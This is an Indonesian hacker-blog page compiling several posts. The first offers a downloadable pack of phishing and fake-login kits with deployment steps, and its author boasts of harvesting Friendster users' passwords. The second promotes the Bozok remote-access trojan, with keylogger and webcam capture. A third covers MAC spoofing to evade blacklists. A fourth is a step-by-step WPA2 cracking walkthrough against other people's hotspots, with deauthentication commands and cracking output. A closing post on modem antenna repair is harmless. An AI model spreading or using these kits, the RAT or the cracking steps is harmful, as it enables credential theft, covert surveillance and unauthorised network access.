Minggu, 11 Mei 2014

Kumpulan Phising & Fake Login Script


Ya yu ya, dah banyak yang tau kali ya apa itu fake login?
Buad yang gak tau gw jelasin secara umum aje ye.. Kzkzkz.. Byr pada ngerti loe semua, begini negh.
Fake Login: Login Palsu yang biasanya di gunain untuk mencuri, ngambil, log, password / identitas login seseorang.
Nah dari situ ada beberapa ni, yang gw dapet dari searching, mayan buad isengin orang.. Kzkzkz
Kumpulan Fake Login & Phising 2009 – Update Terbaru
  1. -Anonymous Mailer
  2. -Phisher Maker! Read the ReadMe.txt
  3. -Jiffy Gmail Account Creator – Create GMAIL acc for setting up hosting acc etc.
  4. -Tarantula a Powerful software to extract e-mail addresses matching your keyword query
  5. -RapidExtract is a tool that checks EMAIL:PASSWORD lists, for rapidshare accounts, if the email has a rapidshare account it then sends the login to the email. Then you can login to the email (most people use same pass for everything) and obtain the rapidshare account.
  6. -IP Hider Pack – Read the ReadMe.txt
  7. -Steam Phiser
  8. -Rapidshare Phiser
  9. -Friendster Phiser
  10. -Gmail Phisher
  11. -Habbo Phisher
  12. -Facebook Phisher
  13. -Photobucket Phisher
  14. -XboxLive Phisher
  15. -AIM Phisher
  16. -GaiaOnline Phisher
  17. -IMVU Phisher
  18. -AstaTalk Phisher
  19. -Warez-bb Phisher
  20. -Hotmail Phisher
  21. -Paypal Phisher
  22. -Runescape Phisher
  23. -Youtube Phisher
  24. Dll
DOWNLOADNYA DISINI: Kumpulan Fake Login & Phising!
Mirrornya di:
http://trickurpc.blogspot.com/2007/09/duplicate-fake-login-pages.html
Nah, sekarang? Gimana cara gunainnya ntuh script?
Hups, ini hasil editan gw sendiri loh ;P
1. Download dolo scriptnya / langsung di wget di servernya :)
2. Abis itu klo dah ke Upload tinggal di Extract. Misal: Extract di /home/gwe/public_html/aku
3. Abis itu cara jalaninnya.. http://www.sitenya.com/aku/
4. Selamat mencoba, good luck..
Ni, contoh fake login FS punya gwe sendiri yang baru.. Hehehe.. Gak make yang ono.. Silakan di cek di
Mayan buad dapetin password anakanak FS, jangan lupa pake direct link :)  * Ati ati, jangan sekali kali login dari sana, karena bisa saya lihat.. Wwkwkwkkw.. *Ntr saya ambil loh.. Kekekke… Kzkzkzkz.. xD
Oh ya, klo gak teu direct link, ask om google ya: “direct link” Hueheue..  Banyak kok..
Oh ya, ni skalian gw kasi tips supaya hati hati gak kna Fake Login:
1) Perhatikan dengan benar link address websitenya. Contoh klo FS linknya: http://www.friendster.com/login.php <- jadi pastikan linknya: www.friendster.com
2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita kepada si Hacker.
3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ‘start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ‘start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’
4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.
5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang oleh para hacker. Kekekeke..
Ini cuma tutorial, segala tindak tanduk ya terserah anda.. Kzkzkzkz.. Sekian dari saya ;P
Klo mo bertanya silakan di #BINUSHACKER @ IRC.DAL.NET
Dedicated to All Member of BinusHacker Family
Loe² Semua Yang Dah Berkunjung Ke Web Ini.. :)
Sahabat sahabat gwe, doain Novel gwe selesai ya.. Kzkzkz
========= EOF =========

Remote Administration Tools – Bozok RAT

Greeting BinusHacker Family,
Sharing sebuah tools yaitu remote administration tools (RAT) untuk windows, dimana aplikasi ini bisa berjalan di platform XP-Win8. Kemampuan tools Bozok ini cukup lumayan dimana dilengkapi dengan mematikan dan menghidupkan proses, mengatur services, keylogger dan webcam live capture.
Bozok RAT Latest - BinusHacker
Menu-menu dan fungsi-fungsi yang tersedia sebagai berikut:
  1. Filemanager:
      • Download/Upload File
      • Rename File
      • Delete File
      • Execute File
        • Hidden
        • Visible
      • Create Folder
    Bozok RAT - BinusHacker
    Bozok 1.0.1
  2. Processmanager
      • Terminate Process
    Bozok RAT - Screen - BinusHacker
    Bozok Screen
  3. Windowmanager
    • Close Window
    • Maximize/Minimize
  4. Servicemanager
    • Stop Service
    • Pause Service
    • Resume Service
    • Start Service
  5. Installation
    • Doesnt fire up UAC
    • Compitable with XP-Windows7 (both architectures)
    • Startup
    • Melt
    • Mutex Check
  6. Unicode compatible
Fitur lainnya:
    1. Remote Desktop
      • Control mouse/keyboad
    2. Keylogger
      • Bozok RAT - BinusHacker
        Bozok RAT – BinusHacker
    3. Webcam
      • Bozok RAT - BinusHacker
        Bozok RAT – BinusHacker

LEBIH DETAIL CARA PENGGUNAANNYA BISA DILIHAT DI VIDEO TUTORIAL BOZOK RAT

Download Tools Selengkapnya:

Tutorial Mengganti MAC Address




Cara Mengganti Alamat MAC Address
Sumber : Binus Hacker

MAC Address ] Media Access Control ( MAC) Address biasanya digunakan sebagai sistem pemberian identitas dengan penomoran unik pada berbagai periferal jaringan. Sebagai contoh disini adalah kartu jaringan atau ethernet. Pada setiap ethernet pasti memiliki alamat MAC Address berbeda yang bersifat unik dan khas bahkan untuk tipe yang sama sekalipun pada setiap PC.
Berbeda dengan IP AddressMAC Address memiliki identitas yang unik dan dibuat secara permanen oleh si produsennya. Ini dimanfaatkan untuk berbagai keperluan authentication client pada suatu sistem server. Namun demikian pada beberapa kasus bisa membawa masalah bagi penggunanya, sebagai contoh seorang pengguna mengakses layanan Internet pada beberapa area Wi-fi hotspot yang mana layanan tersebut menggunakan proses authentication MAC Address.
Masalah akan muncul apabila ethernet card di PC rusak lalu diganti dengan yang baru, maka secara otomatis MAC Address-nya akan turut berubah. Untuk dapat mengkases kembali layanan tersebut pengguna harus melaporkan kembali MAC Address baru ke layanan penyelia Hospot. Sangat merepotkan bukan ?
Sekarang, Pernahkan Anda Mengalami Hal Ini?
  1. Anda tidak bisa melakukan browsing karena MAC Address anda terdaftar di Blacklist?
  2. Anda tidak bisa melakukan koneksi jaringan karena MAC Address anda tidak terdaftar?
  3. Anda tidak bisa mengakses sebuah situs karena MAC Address anda ada di Squid list dan limited akses?
Berikut ini adalah cara yang dapat anda lakukan untuk merubah MAC Address anda :)

Mengganti MAC Address Ethernet Card Di Linux

Sebenarnya ada cara sederhana untuk mengatasi masalah ini yaitu dengan cara memodifikasi MAC Address sehingga ethernet card yang baru dilaporkan oleh sistem operasi seolah-olah memiliki MAC Address yang sama dengan ethernet card lama. Cara ini dikenal dengan juga sebagai spoofing MAC Address ini dapat kita lakukan dengan mudah dan cepat di sistem Linux.
Anda tidak perlu menggunakan tool tambahan, cukup dengan perintah internal ifconfig, perintahnya adalah sebagai berikut :
Kita coba dulu dengan perintah berikut untuk melihat MAC Address
$ ifconfig -a | grep HWaddr
eth0 Link encap:Ethernet HWaddr 00:80:48:BA:d1:20
Login sebagai root, ketikkan perintah berikut untuk merubah MAC Address
#ifconfig eth0 down
#ifconfig eth0 hw ether 00:40:fe:e2:ae:4b
#ifconfig eth0 up
Anda juga bisa mencoba cara berikut untuk pengguna Ubuntu:
$ ifconfig
$ cd /etc/init.d
$ sudo nano ChangeMAC
Kemudian ganti konfigurasi, isi XX sesuai dengan keinginan
sudo ifconfig eth1 down
sudo ifconfig eth1 hw ether xx:xx:xx:xx:xx:xx
sudo ifconfig eth1 up
sudo /etc/init.d/networking stop
sudo /etc/init.d/networking restart
Simpan dan close filenya
Kemudian jalankan perintah berikut dan restart ifconfig:
$ sudo chmod +x ChangeMAC
$ sudo update-rc.d ChangeMAC defaults
Untuk memeriksa MAC Address yang telah berubah, jalankan lagi perintah ifconfig.

Mengganti MAC Address Ethernet Card Di Windows

Pada sistem windows beberapa produsen ethernet card menyediakan fasilitas pergantian MAC Address melalui Device Manager Windows atau melalui akses registry yang sukar diingat. Namun ada cara yang sedikit berbeda dan mudah dilakukan, yaitu dengan sedikit bantuan tool yang diberi nama SMAC. yang ilustrasinya dapat dilihat pada gambar dibawah ini.
Jika anda berniat untuk merubah alamat MAC Address silahkan unduh toolnya pada link download dibawah ini:
Download : Tool MAC Address Ethernet Card
Tool MAC Address Ethernet Card

Wireless Hacking – Cracking WPA / PSK Key

Wireless Hacking Using BackTrack 5



Sumber : Binus Hacker


Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)
Download BackTrack 5 Disini:
Download BackTrack 5
Download Wordlist John The Ripper Disini:
Download Wordlist
Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install :)

Oke mari kita lanjutkan:
1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:
root@binushacker:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)
2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:

root@binushacker:~# airodump-ng mon0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless
3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2
CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:

root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#

5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161
6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:00] 48 keys tested (489.60 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu: W!R3L3$$PWD
7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:22] 11484 keys tested (534.50 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD

Cara Memperbaiki Antena Internal Modem


Sumber : Binus Hacker


Kali ini berbagi tutorial mengenai Cara Memperbaiki Antena Internal Modem, hal ini dilakukan di Smartfren CE682, kemungkinan bisa dilakukan dibeberapa model dan produk modem lainnya. Hal ini bermanfaat untukmemperbaiki sinyal, koneksi bahkan dapat meningkatkan dan menstabilkan bandwidth :)

Penulisan artikel ini bermula dari kesalahan penulis tentang cara pembongkaran modem smartfren CE682 UI sehingga menyebabkan lempengan hijau yang menempel erat dengan cashing sobek, otomatis terputus juga jalur PCB tipisnya. lempengan hijau dengan jalur PCB tipis ini selanjutnya kita sebut sebagai antena internal modem. Kesalahan ini mengakibatkan signal yang ditangkap modem menjadi 0 bar dan setiap kali penulis mencoba untuk melakukan koneksi selalu mengalami error opening port “the modem or other connecting device is already in use or is not configured properly“.
Sempat berfikir untuk menggunakan antena eksternal, namun ternyata agak sulit pemasangannya pada modem Smartfren CE682 UI dan tentunya menggunakan biaya yang tidak sedikit. informasi terakhir yang penulis terima, antena eksternal yagi extreme mencapai harga 250.000 (lebih baik untuk membeli modem baru :D )
Cara Memperbaiki Antena Internal Modem Smartfren CE682 UI:
  1. Sediakan alat dan bahan: gunting, obeng, kabel usb extender (any size, recomended 5 atau 10 meter), kabel kawat tembaga (kira-kira 50cm).
  2. Buka cashing modem.
  3. Perhatikan, terdapat lembaran hijau tipis yang terdapat lempeng tembaga (kurang lebih hanya setebal kertas), inilah antena internal modem internal Smartfren CE682 UI.
  4. Potong antena tersebut dibagian pangkal hingga tak bersisa lempengan hijau antena internalnya.
  5. Kelupas kabel kawat tembaga, lalu lilitkan ke dalam badan modem (bukan pada cashing) dengan ujung kabel menyentuh bagian berwarna kuning dibelakang lokasi solder antena internal asli. kondisikan agar ujung kabel menempel kuat dan tidak goyang. sisakan 30-35 cm.
  6. Buat sisa kawat tembaga seperti pegas, lalu arahkan ke – atas.
  7. Sambungkan modem dengan usb extender, direkomendasikan untuk menggantung modem agar modem tidak mengalami kerusakan akibat terinjak dsb. karena cashing modem tidak mungkin dapat terpasang.
Bagaimana? Cukup memuaskan kan setelah antena diperbaiki.
Semoga coretan ini bermanfaat untuk kita semua :)